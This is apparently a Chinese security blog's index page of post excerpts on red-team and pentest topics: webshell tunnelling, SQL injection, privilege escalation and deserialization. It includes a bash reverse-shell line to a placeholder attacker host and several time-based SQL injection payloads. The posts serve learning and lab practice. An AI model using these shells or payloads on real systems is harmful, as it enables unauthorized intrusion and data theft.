记录一次内网不出网cs上线渗透操作过程 记录一次内网不出网cs上线渗透 0x00 因为遇到一个不出网的站并且拿到了shell,就想试试免杀上线cs。 0x01 pystinger使用 这次用的是FunnyWolf/pystinger: Bypass firewall for traffic forwarding using webshell 一款使用webshell进行流量转发的出网工具 (github.com) ,来实现的。 1 2021-11-17 web学习 学习 web学习
(CVE-2018-6893)Finecms-5-2-0-SQL注入漏洞(dns注入-时间盲注)记录 (CVE-2018-6893)Finecms-5-2-0-SQL注入漏洞(dns注入-时间盲注)记录 0x00 最近遇到个站用的是finecms,然后看漏洞库有一个SQL注入的漏洞,试了试符合漏洞库上说的特征,输入以下payload正常显示,如果更改内容可以导致报错。(2e746573747465737473742e636579652e696f5c5c616161)是unc路径的十六进制编码。 2021-11-11 web学习 学习 web学习
ATT&CK红队评估二 内网靶场记录 ATT&CK红队评估二套靶场 0x00 环境搭建 这里有个坑,就是WEB靶机密码是不对的,就离谱,我网上找了半天也没看到有人说这个问题,最后看到一个师傅的博客上说web靶机密码不对可以还原虚拟机快照,WEB靶机恢复到快照1.3即可 靶机配置: 0x01 外网信息收集 注:我这搭建的的环境不太对劲,不管我怎么操作,WEB机器一直连不上域网络,而且登陆就会提示此工作站与域的信 2021-10-03 web学习 学习 web学习
java反序列化学习与复现 java反序列化学习与复现 0x00 前言 最近面试被问到了,学长说那位是大佬,还问了二进制(好久没学了突然问二进制,没准备只能知道啥答啥了qaq,怕是寄了),奈何自己一直没去了解java反序列化,虽然挖到过shiro反序列化,但是没有去详细了解,不过我呢要学就是那种详细了解的,最近一直在学红队的技术(内网渗透,还看了冰蝎的魔改,frp的魔改,确实大佬们挺强),和实战挖洞,不多说先实际操 2021-09-28 web学习 学习 web学习
linux/Windows提权(方法以及命令记录/未复现) linux/Windows提权(方法以及命令记录/未复现) 1、Linux提权 1.1 基础信息收集 1.1.2 服务器信息收集 1234567891011121314151617181920212223242526272829303132333435363738394041424344451、查看内核、操作系统、设备等信息uname -a 打印所有可用的系统信息uname -r 2021-09-27 web学习 学习 web学习
python分割补全ip小脚本(用于goby) python分割补全ip小脚本(用于goby) 0x00 前言 在渗透测试中,时常遇到给的资产像123.123.123.12-46,123.211.111.2,123.123.111.4-7,111.111.111.111,诸如此类用逗号分开,然后ip范围是在后面像12-46这样指定的资产,goby不能识别这样的ip,只认123.123.123.12-123.123.123.46,这样的 2021-09-25 小工具 学习 小工具
linux/windows反弹shell的利用方式和复现 linux/windows反弹shell的利用方式和复现 1.linux反弹 1.1.Bash反弹 攻击机器命令 1nc -lvp 攻击机端口 靶机命令 1bash -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1 效果 1.2.python反弹 攻击机器命令 1nc -lvp 攻击机端口 靶机命令 1python -c "import 2021-09-22 web学习 学习 web学习
记一次实战渗透sql时间注入payload利用(select(0)from(select(sleep(6)))v) 记一次实战sql时间注入payload利用(select(0)from(select(sleep(6)))v) 0x01 前言 某次渗透,又遇到了一个AWVS的payload是 (select(0)from(select(sleep(6)))v)/*’+(select(0)from(select(sleep(6)))v)+’"+(select(0)from(select(sle 2021-09-11 web学习 学习 web学习
记一次渗透一波三折找到的springboot利用 记一次渗透一波三折找到的springboot利用 0x01 前言 在渗透某企业的时候(好久之前的了,写个总结),拐了七八个弯,终于在这个企业的某c段找到了个springboot未授权访问,真是拐了七八个弯,先从某管理系统入手,扫目录,弱密码,注入,还发现了fck文件编辑器,但是都没有用,最后还是突然发现该企业真实ip的特点->除了cdn的ip大多数都在一个ipc段,然后在某个ip找 2021-08-23 web学习 学习 web学习
记一次渗透某企业遇到的sql延时盲注启发 记一次渗透某企业遇到的sql延时盲注启发 主要是记录一下自己写的脚本2333,只能说sqlmap真不是万能的2333. 0x01 注入 首先,某站用awvs扫出来个延时注入,payload是if(now()=sysdate(),sleep(15),0),我一看这不mysql延时注入吗,直接sqlmap跑不就完事了,然而事情好像没这么简单,即使我指定了数据库是mysql,方式是延时盲 2021-08-17 web学习 学习 web学习